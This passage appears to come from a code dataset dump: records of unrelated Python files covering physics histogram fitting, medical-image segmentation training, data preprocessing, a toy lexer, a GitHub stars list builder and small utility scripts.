values\n\t\tyTestBHist = plt.hist(yTestB, bins=binsTab, density=True,alpha = 0.0)\n\t\tbin_centers = 0.5*(binsTab[1:] + binsTab[:-1])\n\t\tax.scatter(bin_centers, yTestSHist[0], marker='o', c='r', s=20, alpha=1,label='Signal (test)') \t# Display as dot in histogram\n\t\tax.scatter(bin_centers, yTestBHist[0], marker='o', c='b', s=20, alpha=1,label='Background (test)') \t# Must take first array for data, second one is bins values\n\n\t\tplt.xlabel('BDT 
signal response')\n\t\tplt.ylabel('Normalized number of events')\n\t\tplt.legend()\n\t\tplt.savefig(f'plots/{pdfName}.pdf')\n\t\tplt.close()\t\n\tif computeInterval:\n\t\tnumberBins=len(binsTab)\n\t\terrorMax=2*(1/(numberBins-1))\n\t\tbinsTab=np.linspace(0, 1, num=numberBins)\n\t\t\n\t\tyTestSHist=np.histogram(yTestS,bins=binsTab,density=False) #Density=True to normalise, not necessary here we just want the max\n\t\tyTestBHist=np.histogram(yTestB,bins=binsTab,density=False)\n\t\tmaxS=np.argmax(yTestSHist[0]) #first tab is the histogram values, second is the bins values on axis\n\t\tmaxB=np.argmax(yTestBHist[0])\n\t\tinterval=abs(binsTab[maxS]-binsTab[maxB])\n\t\t#print(f'Interval between Signal and background max in histogram: {interval} pm {errorMax}')\n\treturn interval,yTrainSHist,yTrainBHist,yTestSHist,yTestBHist\n\n\ndef bgFromExp(blindMin,blindMax,massWidth,paramExpA,paramExpB):\n\treturn (1/massWidth)*( (paramExpA/paramExpB)*(np.exp(-paramExpB*blindMin)-np.exp(-paramExpB*blindMax)) )\ndef monoExp(x, a, b):\n\t\n\treturn (a * np.exp(-b * x) )\n\ndef fitBackground(XselectedBg,printPlotFit):\n\n\t# C,D,E Normalisation factors for easier fit:\n\tC=100\n\tE=5500\n\n\n\tbgMin=5500\n\tbgMax=6500\n\tsteps=21\n\tmassTab=np.linspace(bgMin,bgMax,steps)\t#X axis\n\n\tbinCenters=[(0.5*(massTab[i]+massTab[i+1])-E)/C for i in range (len(massTab)-1)] # X axis transformation for easier fit\n\tmassB0=XselectedBg['B_s0_DTF_M']\n\tmassHist,binEdges=np.histogram(massB0,bins=massTab,density=False) \t# Histogram computation\n\tD=massHist[0]+1\t\t\t\t\t\t\t\t\t\t\t\t\t\t# +1 to avoid dividing by 0\n\tmassHist=massHist/D \t\t\t\t\t\t\t\t\t\t\t\t# Histogram normalised to be ~1 at x=0\n\n\tparams, paramCov = curve_fit(monoExp, binCenters, massHist,bounds=([0.0,0.0], [2.0, 2.0])) # Do the easier exponential fit\n\ta, b=params\n\tA=D*float(a)*np.exp(float(b)*E/C)\n\tB=float(b)/C\n\tdA=np.sqrt(paramCov[0][0])*D*np.exp(B*E/C)\n\tdB=np.sqrt(paramCov[1][1])/C\n\t#print(f'a: {a}, b: {b}, c:{c}')\n\tprint(f'paramCov: {paramCov}')\n\t#dA, dB, dC=paramCov # Estimated covariance on parameters\n\tif printPlotFit:\n\t\tfig, ax = plt.subplots(figsize=(8, 4), dpi=300) \n\t\tax.plot(binCenters,massHist,'k.',label=f'Mass Histogram')\n\t\tax.plot(binCenters,monoExp(np.array(binCenters),*params),'b--', # * in the call expands the tuple into separate elements\n\t\t\t\t\t\t\t\t\tlabel=f'fit: N={\"{0:.4f}\".format(a)}*exp(-{\"{0:.4f}\".format(b)}*M)')\n\t\tplt.xlabel('B_0 mass')\n\t\tplt.ylabel('Number of events')\n\t\tplt.legend()\n\t\tplt.show()\n\t\tplt.close()\t\n\n\tblindingMin=5100\n\tblindingMax=5500\n\tnBgOutBlinding=len(massB0)\n\tmassWidth=(bgMax-bgMin)/(steps-1)\n\tnBgInBlinding=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A,paramExpB=B)#+ c*(blindingMax-blindingMin) )\n\tnBgcheck1=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A+dA,paramExpB=B+dB)\n\tnBgcheck2=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A-dA,paramExpB=B-dB)\n\tupperNBg=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A+dA,paramExpB=B-dB)\n\tlowerNBg=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A-dA,paramExpB=B+dB)\n\t\n\t#print(f'nBgInBlinding:{nBgInBlinding}')\n\t#print(f'upperNBg:{upperNBg}')\n\t#print(f'lowerNBg:{lowerNBg}')\n\t#print(f'nBgcheck1:{nBgcheck1}')\n\t#print(f'nBgcheck2:{nBgcheck2}')\n\n\n\n\tif( (upperNBg<nBgcheck1)|(lowerNBg>nBgcheck2) ):\n\t\tprint(\"ERROR in 
uncertainty computation, min/max are not extremums.\")\n\t#print(f'Ratio {nBgInBlinding/nBgOutBlinding} between inside {nBgInBlinding} and outside blinding: {nBgOutBlinding}')\n\tif nBgOutBlinding < 10:\n\t\tnBgInBlinding=100000\n\t\tprint('Too few events to fit background (<10)')\n\n\terrNBg=np.maximum(abs(upperNBg-nBgInBlinding),abs(nBgInBlinding-lowerNBg))\n\t#print(f'Background: {nBgInBlinding} pm {errNBg}')\n\treturn nBgInBlinding,errNBg\n\n\n\n# Try without scaling function to reduce uncertainty\ndef fitBackgroundTry(XselectedBg,printPlotFit):\n\n\t# C,D,E Normalisation factors for easier fit:\n\tC=100\n\tE=5500\n\n\n\tbgMin=5500\n\tbgMax=6500\n\tsteps=21\n\tmassTab=np.linspace(bgMin,bgMax,steps)\t#X axis\n\n\tbinCenters=[(0.5*(massTab[i]+massTab[i+1])-E)/C for i in range (len(massTab)-1)] # X axis transformation for easier fit\n\tmassB0=XselectedBg['B_s0_DTF_M']\n\tmassHist,binEdges=np.histogram(massB0,bins=massTab,density=False) \t# Histogram computation\n\tD=massHist[0]+1\t\t\t\t\t\t\t\t\t\t\t\t\t\t# +1 to avoid dividing by 0\n\tmassHist=massHist/D \t\t\t\t\t\t\t\t\t\t\t\t# Histogram normalised to be ~1 at x=0\n\n\tparams, paramCov = curve_fit(monoExp, binCenters, massHist,bounds=([0.0,0.0], [2.0, 2.0])) # Do the easier exponential fit\n\ta, b=params\n\tA=D*float(a)#*np.exp(float(b)*E/C)\n\tB=float(b)#/C\n\tdA=np.sqrt(paramCov[0][0])#*D*np.exp(B*E/C)\n\tdB=np.sqrt(paramCov[1][1])#/C\n\t#print(f'a: {a}, b: {b}, c:{c}')\n\t#print(f'paramCov: {paramCov}')\n\t#dA, dB, dC=paramCov # Estimated covariance on parameters\n\tif printPlotFit:\n\t\tfig, ax = plt.subplots(figsize=(8, 4), dpi=300) \n\t\tax.plot(binCenters,massHist,'k.',label=f'Mass Histogram')\n\t\tax.plot(binCenters,monoExp(np.array(binCenters),*params),'b--', # * in the call expands the tuple into separate elements\n\t\t\t\t\t\t\t\t\tlabel=f'fit: N={\"{0:.4f}\".format(a)}*exp(-{\"{0:.4f}\".format(b)}*M)')\n\t\tplt.xlabel('B_0 mass')\n\t\tplt.ylabel('Number of events')\n\t\tplt.legend()\n\t\tplt.show()\n\t\tplt.close()\t\n\n\tblindingMin=(5100-E)/C\n\tblindingMax=(5500-E)/C\n\tnBgOutBlinding=len(massB0)\n\tmassWidth=(bgMax-bgMin)/(steps-1)/C\n\tnBgInBlinding=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A,paramExpB=B)#+ c*(blindingMax-blindingMin) )\n\tnBgExtremum1=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A+dA,paramExpB=B+dB)\n\tnBgExtremum2=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A-dA,paramExpB=B-dB)\n\tnBgExtremum3=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A+dA,paramExpB=B-dB)\n\tnBgExtremum4=bgFromExp(blindMin=blindingMin,blindMax=blindingMax,massWidth=massWidth,paramExpA=A-dA,paramExpB=B+dB)\n\t\n\tprint(f'nBgInBlinding:{nBgInBlinding}')\n\tprint(f'nBgExtremum1:{nBgExtremum1}')\n\tprint(f'nBgExtremum2:{nBgExtremum2}')\n\tprint(f'nBgExtremum3:{nBgExtremum3}')\n\tprint(f'nBgExtremum4:{nBgExtremum4}')\n\n\n\n\t#if( (upperNBg<nBgcheck1)|(lowerNBg>nBgcheck2) ):\n\t#\tprint(\"ERROR in uncertainty computation, min/max are not extremums.\")\n\t#print(f'Ratio {nBgInBlinding/nBgOutBlinding} between inside {nBgInBlinding} and outside blinding: {nBgOutBlinding}')\n\tif nBgOutBlinding < 10:\n\t\tnBgInBlinding=100000\n\t\tprint('Too few events to fit background 
(<10)')\n\n\tupperNBg=np.amax([nBgExtremum1,nBgExtremum2,nBgExtremum3,nBgExtremum4])\n\tlowerNBg=np.amin([nBgExtremum1,nBgExtremum2,nBgExtremum3,nBgExtremum4])\n\n\terrNBg=np.maximum(abs(upperNBg-nBgInBlinding),abs(nBgInBlinding-lowerNBg))\n\tprint(f'Background: {nBgInBlinding} pm {errNBg}')\n\treturn nBgInBlinding,errNBg","repo_name":"marcjacquart/TP4b","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":8734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37463202643","text":"import torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport numpy as np\nfrom torch.utils.tensorboard import SummaryWriter\nimport pickle\nimport argparse\nimport random\nfrom utils import (\n MRISegConfigParser,\n save_model,\n load_data,\n train,\n validate,\n create_dir\n )\n\nfrom torch.utils.data import DataLoader\nfrom factory.scheduler import PolynomialLR\nfrom losses import losses\nfrom model import vaereg\nfrom datasets.data_loader import BraTSDataset\n\n\"\"\"\nUsage:\n\npython train.py --config ./config/test.cfg --model_name ./checkpoints_aug/ --gpu 3\npython train.py --config ./config/test.cfg --model_name ./checkpoints_bilinear/ --gpu 3 --upsampling bilinear\npython train.py --config ./config/test.cfg --model_name ./checkpoints_2branch/ --gpu 1\n\n\"\"\"\n\n\nparser = argparse.ArgumentParser(description='Train MRI segmentation model.')\nparser.add_argument('--config')\nparser.add_argument('--upsampling', type=str, default='bilinear', choices=['bilinear', 'deconv'])\nargs = parser.parse_args()\nconfig = MRISegConfigParser(args.config)\n\ndevice = torch.device('cuda')\n\nfor d in ['checkpoints', config.log_dir]:\n create_dir(d, config.model_name)\n\nif config.deterministic_train:\n seed = 0\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n np.random.seed(seed)\n random.seed(seed)\n torch.manual_seed(seed)\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n\n# TODO: just pass config and figure it out\n#brats_data = BraTSDataset(config.data_dir, config.labels, modes=config.modes, debug=True)\n#train, test = torch.utils.data.random_split(brats_data, [8, 2]) \n#trainp = 228\n#testp = 57\ntrainp = 285\ntestp = 0\n\nbrats_data = BraTSDataset(config.data_dir, modes=config.modes, debug=config.debug, dims=config.dims)\n#train_split, test_split = torch.utils.data.random_split(brats_data, [trainp, testp]) \n#\n#trainloader = DataLoader(train_split, batch_size=1, shuffle=True, num_workers=0)\n#testloader = DataLoader(test_split, batch_size=1, shuffle=True, num_workers=0)\ntrainloader = DataLoader(brats_data, batch_size=1, shuffle=True, num_workers=0)\ntestloader = None\n# specify in config?\ninput_channels = len(config.modes)\noutput_channels = len(config.labels)\n#output_channels = len(config.labels) + 1\n\n# TODO: Replace with builder.\nif config.model_type == 'baseline':\n model = vaereg.UNet()\n model = model.to(device)\nif config.model_type == 'reconreg':\n model = vaereg.ReconReg()\n model = model.to(device)\nif config.model_type == 'vaereg':\n model = vaereg.VAEreg()\n\n# TODO: optimizer factory\n#optimizer = optim.SGD(model.parameters(), lr=0.1, momentum=0.9, weight_decay=0.1)\n#optimizer = optim.Adam(model.parameters(), lr=1e-4, weight_decay=0.1)\n# model_name = config.model_name\noptimizer = \\\n optim.Adam(model.parameters(), lr=1e-4, weight_decay=config.weight_decay)\n\nwriter = SummaryWriter(log_dir=config.log_dir+config.model_name+'/')\nscheduler = 
PolynomialLR(optimizer, config.epochs)\nloss = losses.build(config)\n\nfor epoch in range(1, config.epochs):\n train(model, loss, optimizer, trainloader, device)\n \n #Only validate every x epochs\n if epoch % 5 != 0:\n scheduler.step()\n continue\n\n train_dice, train_dice_agg, train_loss, test_dice, test_dice_agg, test_loss =\\\n validate(model, loss, trainloader, testloader, device)\n\n # Log validation\n writer.add_scalar('Loss/train', train_loss, epoch)\n writer.add_scalar('Dice/train/ncr&net', train_dice[0], epoch)\n writer.add_scalar('Dice/train/ed', train_dice[1], epoch)\n writer.add_scalar('Dice/train/et', train_dice[2], epoch)\n writer.add_scalar('Dice/train/et_agg', train_dice_agg[0], epoch)\n writer.add_scalar('Dice/train/wt_agg', train_dice_agg[1], epoch)\n writer.add_scalar('Dice/train/tc_agg', train_dice_agg[2], epoch)\n\n if test_dice and test_loss:\n writer.add_scalar('Loss/test', test_loss, epoch)\n writer.add_scalar('Dice/test/ncr&net', test_dice[0], epoch)\n writer.add_scalar('Dice/test/ed', test_dice[1], epoch)\n writer.add_scalar('Dice/test/et', test_dice[2], epoch)\n # TODO: make this just test and add agg score\n print(\"epoch: {}\\ttrain loss: {}\\ttrain dice: {}\\t\\\n test loss: {}\\t test dice: {}\".format(epoch, train_loss, \n [ d.item() for d in train_dice ], test_loss, [ d.item() for d in test_dice ])) \n print(\"epoch: {} ||| train loss: {} ||| train dice: {} ||| train dice agg: {}\".format(epoch, \n train_loss, [ d.item() for d in train_dice ], [ d.item() for d in train_dice_agg ])) \n save_model(config.model_name, epoch, writer, model, optimizer) \n scheduler.step()\n \n","repo_name":"KelestZ/vae-reg-brainseg","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17899983966","text":"# /rules/tests/run_test.sh -r set_user_attribute_value -a \"jmelius,test,value\" -j\nimport irods_types # pylint: disable=import-error\n\nfrom datahubirodsruleset.decorator import make, Output\n\n\n@make(inputs=[0, 1, 2], outputs=[], handler=Output.STORE)\ndef set_user_attribute_value(ctx, username, attribute, value):\n \"\"\"\n Set an attribute value to the input user\n\n Parameters\n ----------\n ctx : Context\n Combined type of callback and rei struct.\n username : str\n The username\n attribute : str\n The user attribute to set\n value : str\n The user attribute's value to set\n\n Returns\n -------\n dict\n The attribute value\n \"\"\"\n kvp = ctx.callback.msiString2KeyValPair(\"{}={}\".format(attribute, value), irods_types.BytesBuf())[\"arguments\"][1]\n ctx.callback.msiSetKeyValuePairsToObj(kvp, username, \"-u\")\n ctx.callback.msiWriteRodsLog(\"INFO: {}: Setting '{}' to '{}'\".format(username, attribute, value), 0)\n","repo_name":"MaastrichtUniversity/irods-ruleset","sub_path":"datahubirodsruleset/users/set_user_attribute_value.py","file_name":"set_user_attribute_value.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"40223156186","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport sys\n\nfrom sklearn.model_selection import cross_validate\nfrom sklearn.preprocessing import LabelEncoder\n\ndef preprocess(train_store, test):\n # since competition open since have similar meanings we can merge into once\n train_store['CompetitionOpenSince'] = np.where((train_store['CompetitionOpenSinceMonth'] == 0) & 
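# --- Illustrative aside on the vectorized conditional above (toy frame, invented column names): np.where(cond, a, b) selects elementwise between two branches, exactly the pattern used for CompetitionOpenSince. ---\nimport numpy as np\nimport pandas as pd\ndemo = pd.DataFrame({'Year': [2015, 2015], 'Month': [7, 7], 'SinceYear': [0, 2014], 'SinceMonth': [0, 9]})\nmonths_open = np.where((demo.SinceMonth == 0) & (demo.SinceYear == 0), 0, (demo.Month - demo.SinceMonth) + 12 * (demo.Year - demo.SinceYear))\n# -> array([ 0, 10])\n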
(train_store['CompetitionOpenSinceYear'] == 0), 0, (train_store.Month - train_store.CompetitionOpenSinceMonth) +\n (12 * (train_store.Year - train_store.CompetitionOpenSinceYear)))\n\n # we can get rid of `CompetitionOpenSinceYear` and `CompeitionOpenSinceMonth`\n del train_store['CompetitionOpenSinceYear']\n del train_store['CompetitionOpenSinceMonth']\n\n # data extraction\n # TODO: extract to sklearn pipelines\n test['Year'] = test.index.year\n test['Month'] = test.index.month\n test['Day'] = test.index.day\n test['WeekOfYear'] = test.index.weekofyear\n\n print(train_store.dtypes)\n # print(train_store[train_store['StateHoliday'].na()])\n # transform stateholiday\n train_store[\"StateHoliday\"] = train_store['StateHoliday'].map(\n {\"0\": 0, \"a\": 1, \"b\": 1, \"c\": 1})\n features = test.columns.tolist()\n features.pop(0)\n features_df = train_store[features]\n print(features_df.head())\n targets = np.log(train_store.Sales)\n print(targets)\n # targets = float(targets)\n return features_df, targets\n\nclass data_preprocess:\n def __init__(self) -> None:\n pass\n #log the initialization of a class here\n def get_numerical_columns(self, df):\n \"\"\"Get numerical columns from dataframe.\"\"\"\n \n num_col = df.select_dtypes(\n exclude=\"object\").columns.tolist()\n return num_col\n \n def get_categorical_columns(self, df):\n \"\"\"Get categorical columns from dataframe.\"\"\"\n return df.select_dtypes(\n include=\"object\").columns.tolist()\n \n def drop_duplicate(self, df: pd.DataFrame) -> pd.DataFrame:\n \n df = df.drop_duplicates(subset='Date')\n\n return df\n \n def get_missing_values(self, df):\n \n return df.isnull().sum()\n def convert_to_datetime(self, df, column):\n df[column] = pd.to_datetime(df[column])\n return df\n \n def is_weekend(self, date):\n\n return 1 if (date.weekday() > 4 or date.weekday() < 1) else 0\n \n def extract_fields_date(self, df, date_column):\n \n df['Year'] = df[date_column].dt.year\n df['Month'] = df[date_column].dt.month\n df['Day'] = df[date_column].dt.day\n df['DayOfWeek'] = df[date_column].dt.dayofweek\n df['weekday'] = df[date_column].dt.weekday\n df['weekofyear'] = df[date_column].dt.weekofyear\n df['weekend'] = df[date_column].apply(self.is_weekend)\n return df\n\n def label_encode(self, df, columns):\n\n label_encoded_columns = []\n # For loop for each columns\n for col in columns:\n # We define new label encoder to each new column\n le = LabelEncoder()\n # Encode our data and create new Dataframe of it,\n # notice that we gave column name in \"columns\" arguments\n column_dataframe = pd.DataFrame(\n le.fit_transform(df[col]), columns=[col])\n # and add new DataFrame to \"label_encoded_columns\" list\n label_encoded_columns.append(column_dataframe)\n\n # Merge all data frames\n label_encoded_columns = pd.concat(label_encoded_columns, axis=1)\n return label_encoded_columns\n\n def fill_missing_median(self, df, columns):\n \n for col in columns:\n df[col] = df[col].fillna(df[col].median())\n return df\n\n def get_missing_data_percentage(self, df):\n \n total = df.isnull().sum().sort_values(ascending=False)\n percent_1 = total/df.isnull().count()*100\n percent_2 = (round(percent_1, 1)).sort_values(ascending=False)\n missing_data = pd.concat(\n [total, percent_2], axis=1, keys=['Total', '%'])\n return missing_data\n \n def fill_missing_with_zero(self, df, columns):\n \n for col in columns:\n df[col] = df[col].fillna(0)\n return df\n\n def replace_outliers_iqr(self, df, columns):\n \n for col in columns:\n Q1, Q3 = df[col].quantile(\n 0.25), 
df[col].quantile(0.75)\n IQR = Q3 - Q1\n cut_off = IQR * 1.5\n lower, upper = Q1 - cut_off, Q3 + cut_off\n\n df[col] = np.where(\n df[col] > upper, upper, df[col])\n df[col] = np.where(\n df[col] < lower, lower, df[col])\n return df\n \n def fill_missing_mode(self, df, columns):\n for col in columns:\n df[col] = df[col].fillna(df[col].mode()[0])\n return df\n","repo_name":"michaelgetachew-abebe/Pharmaceutical-Sales-Prediction_Rossmann","sub_path":"scripts/data_preprocess.py","file_name":"data_preprocess.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8864970598","text":"# --------------------------------\n# module: toy_lexical_tokens.py\n#\n# tokens for toy language\n# --------------------------------\n\nfrom ply.lex import TOKEN\n\n# List of token names\ntokens = (\n 'PLUS',\n 'MINUS',\n 'MULTI',\n 'EQUAL',\n 'LPAREN',\n 'RPAREN',\n 'SEMICOLON',\n 'ID',\n 'LITERAL'\n)\n\n# Simple token regex\nt_PLUS = r'\\+'\nt_MINUS = r'-'\nt_MULTI = r'\\*'\nt_EQUAL = r'\\='\nt_LPAREN = r'\\('\nt_RPAREN = r'\\)'\nt_SEMICOLON = r'\\;'\nt_ID = r'([A-Za-z_]([A-Za-z_]|[0-9])*)'\n\n# More complex literal token\nliteral = r'(0|([1-9]([0-9]*)))'\n\n\n@TOKEN(literal)\ndef t_LITERAL(t):\n t.value = int(t.value)\n return t\n\n\n# Ignore whitespace and newline tokens\nt_ignore = ' \\n'\n\n\n# Error handling\ndef t_error(t):\n print(\"error\")\n t.lexer.skip(1)\n","repo_name":"hsilman/Toy_Interpreter_Python","sub_path":"toy_lexical_tokens.py","file_name":"toy_lexical_tokens.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"20816481963","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom io import BytesIO\nfrom collections import OrderedDict\nimport click\nfrom github3 import GitHub\n\n\ndesc = '''# MyStars\n\n\n## Contents\n'''\n\nlicense_ = '''\n## License\n\n[![CC0](http://mirrors.creativecommons.org/presskit/buttons/88x31/svg/cc-zero.svg)]\\\n(https://creativecommons.org/publicdomain/zero/1.0/)\n\nTo the extent possible under law, [{username}](https://github.com/{username})\\\n has waived all copyright and related or neighboring rights to this work.\n'''\n\nhtml_escape_table = {\n \">\": \">\",\n \"<\": \"<\",\n}\n\n\ndef html_escape(text):\n \"\"\"Produce entities within text.\"\"\"\n return \"\".join(html_escape_table.get(c, c) for c in text)\n\n\n@click.command()\n@click.option('--username', envvar='USER', help='GitHub username')\n@click.option('--token', envvar='GITHUB_TOKEN', help='GitHub token')\n@click.option('--sort', is_flag=True, help='sort by language')\n@click.option('--repository', default='', help='repository name')\n@click.option('--message', default='update stars', help='commit message')\n@click.version_option(version='1.3.1', prog_name='starred')\ndef starred(username, token, sort, repository, message):\n \"\"\"GitHub starred\n\n creating your own Awesome List used GitHub stars!\n\n example:\n starred --username maguowei --sort > README.md\n \"\"\"\n if repository:\n if not token:\n click.secho('Error: create repository need set --token', fg='red')\n return\n file = BytesIO()\n sys.stdout = file\n else:\n file = None\n\n gh = GitHub(token=token)\n stars = gh.starred_by(username)\n click.echo(desc)\n repo_dict = {}\n\n for s in stars:\n language = s.language or 'Others'\n description = html_escape(s.description).replace('\\n', '') if s.description else ''\n if 
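# --- Illustrative aside on the IQR rule in replace_outliers_iqr above, run on a toy Series (values invented): anything beyond Q1/Q3 by 1.5 * IQR is clipped to the fence. ---\nimport numpy as np\nimport pandas as pd\ns = pd.Series([1., 2., 3., 4., 100.])\nq1, q3 = s.quantile(0.25), s.quantile(0.75)\ncut = 1.5 * (q3 - q1)\nclipped = np.where(s > q3 + cut, q3 + cut, np.where(s < q1 - cut, q1 - cut, s))\n# -> [1., 2., 3., 4., 7.]\n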
language not in repo_dict:\n repo_dict[language] = []\n repo_dict[language].append([s.name, s.html_url, description.strip()])\n\n if sort:\n repo_dict = OrderedDict(sorted(repo_dict.items(), key=lambda l: l[0]))\n\n for language in repo_dict.keys():\n data = u' - [{}](#{})'.format(language, language.lower())\n click.echo(data)\n click.echo('')\n\n for language in repo_dict:\n click.echo('## {} \\n'.format(language.replace('#', '# #')))\n for repo in repo_dict[language]:\n data = u'- [{}]({}) - {}'.format(*repo)\n click.echo(data)\n click.echo('')\n\n click.echo(license_.format(username=username))\n\n if file:\n rep = gh.repository(username, repository)\n if rep:\n readme = rep.readme()\n readme.update(message, file.getvalue())\n else:\n rep = gh.create_repository(repository, 'A curated list of my GitHub stars!')\n rep.create_file('README.md', 'starred initial commit', file.getvalue())\n click.launch(rep.html_url)\n\nif __name__ == '__main__':\n starred()\n","repo_name":"flyfei/starred-build","sub_path":"starred.py","file_name":"starred.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70034099245","text":"from torch.utils.data import DataLoader\nfrom tqdm import tqdm\nfrom utils.model_config import Config\nfrom label_aware import MulCon\nfrom Dataset import get_labels_vocab\nfrom Dataset import multi_intent_dataset, aktify_multi_intent_dataset\nfrom transformers import BertTokenizer\nimport torch\nfrom utils.metrics import calc_score,f1_score_intents\n\n# path = \"/Users/yurunsong/Desktop/Multi-Intent/Multi-Intents-Detection/data/MixSNIPS_clean\"\npath = \"/home/song/Desktop/Multi-Intents-Detection/data/Aktify\"\n\nconfig = Config()\n\nlabels = get_labels_vocab(config, path)\nprint(labels)\n\nmodel = MulCon(config, labels)\n\nlr = 1e-5\nopt = torch.optim.AdamW(model.parameters(), lr, betas=(0.9, 0.999), eps=1e-08, weight_decay=1e-2)\nepochs = 50\n\ntokenizer = BertTokenizer.from_pretrained(\"bert-base-uncased\")\ntrain_dataset = aktify_multi_intent_dataset(path, \"train\", tokenizer)\ntest_dataset = aktify_multi_intent_dataset(path, \"test\", tokenizer)\n\ntrain_data_loader = torch.utils.data.DataLoader(train_dataset, batch_size=2, shuffle=False)\ntest_data_loader = torch.utils.data.DataLoader(test_dataset, batch_size=2, shuffle=False)\n\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\nmodel = model.to(device)\n\n# iterate by epoch; the inner enumerate loops reuse i, so the epoch count must not depend on it\nfor epoch in range(epochs):\n\tmodel.train()\n\ttrain_loss = []\n\ttest_loss = []\n\n\tfor i, data in enumerate(train_data_loader):\n\t\topt.zero_grad()\n\t\tx_utter = data[\"input_ids\"].to(device)\n\t\tx_mask = data[\"attention_mask\"].to(device)\n\t\ty_labels = data[\"intent\"].to(device)\n\t\toutput = model(x_utter,x_mask,y_labels)\n\t\t# print(loss1)\n\t\t# print(loss2)\n\t\t# loss = loss1 * 0.5 + loss2 * 0.5\n\t\toutput[0].backward()\n\t\topt.step()\n\t\ttrain_loss.append(output[0].item())\n\n\tmodel.eval()\n\n\twith torch.no_grad():\n\t\tfor i, batch in enumerate(test_data_loader):\n\t\t\tinput_ids = batch[\"input_ids\"].to(device)\n\t\t\tattention_mask = batch[\"attention_mask\"].to(device)\n\t\t\tlabels = batch[\"intent\"].to(device)\n\t\t\toutput = model(input_ids, attention_mask, labels)\n\t\t\tlogits = output[1]\n\t\t\tloss = output[0]\n\t\t\t_, _, _, acc = calc_score(logits, labels)\n\t\t\tP, R, f1, _ = f1_score_intents(logits, labels)\n\t\t\tacc /= input_ids.size(0)\n\t\t\ttest_loss.append(output[0].item())\n\n\tprint(f\"loss {loss}\")\n\tprint(f\"acc: {acc}\")\n","repo_name":"zjc664656505/PCMID","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44859535113","text":"import ipdb\nimport numpy as np\nimport os\nfrom multiprocessing import Process, Queue, Lock\nfrom moviepy.video.io.ImageSequenceClip import ImageSequenceClip\nimport skvideo.measure as skv\nfrom glob import glob\nimport csv\nfrom tqdm import tqdm\nfrom cvbase.optflow.visualize import flow2rgb\nfrom cvbase.optflow.io import read_flow\nimport torch\n\n\ndef make_uint8(im):\n return (255 * im).astype('uint8')\n\n\ndef normalize_flows(vid, newmin=-1, newmax=1):\n minval = vid.min()\n maxval = vid.max()\n return (newmax-newmin)/(maxval-minval)*(vid-minval)+newmin\n\n\ndef job(item):\n fn = item\n outpath = os.path.join(fn, 'flow.mp4')\n if not os.path.exists(outpath):\n flows = torch.stack([torch.from_numpy(read_flow(_))\n for _ in glob(os.path.join(fn, '*.flo'))])\n flows = list(normalize_flows(flows))\n flows = list(flows)\n rgb_flows = [make_uint8(flow2rgb(_.numpy())) for _ in flows]\n vid = ImageSequenceClip(\n rgb_flows, fps=8)\n vid.write_videofile(outpath, fps=8, verbose=False, logger=None)\n vid.close()\n\n\ndef worker(inq, outq, lock):\n for item in iter(inq.get, None):\n job(item)\n outq.put(0)\n\n\nif __name__ == \"__main__\":\n inq = Queue()\n outq = Queue()\n lock = Lock()\n nproc = 3\n basepath = \"YOUR PATH HERE\"\n data = glob(os.path.join(basepath, '*'))\n for item in data:\n inq.put((item))\n for i in range(nproc):\n inq.put(None)\n for i in range(nproc):\n Process(target=worker, args=(inq, outq, lock)).start()\n c = 0\n for item in tqdm(data):\n outq.get()\n","repo_name":"cvlab-columbia/oops","sub_path":"utils/flow_imgs_to_vids.py","file_name":"flow_imgs_to_vids.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"19"} +{"seq_id":"14155832143","text":"import pickle\n\ndata = [{'name': 'John', 'age': 25, 'gender': 'Male'}]\n# pickling write binary, read binary\nwith open(\"data\", 'wb') as f:\n pickle.dump(data, f)\nprint(\">>>\", pickle)\nwith open('data', 'rb') as f:\n new_data = pickle.load(f)\nprint(new_data)","repo_name":"Santosh-Kumar29/study_python_ds","sub_path":"pickling_unpickling.py","file_name":"pickling_unpickling.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33531127347","text":"from __future__ import absolute_import\nimport requests\nimport json\n\n\nfrom celery import shared_task\n\n\n@shared_task\ndef fetch_schedule(bind=True):\n r = requests.get('http://schedule.assembly.org/asms15/schedules/events.json')\n if 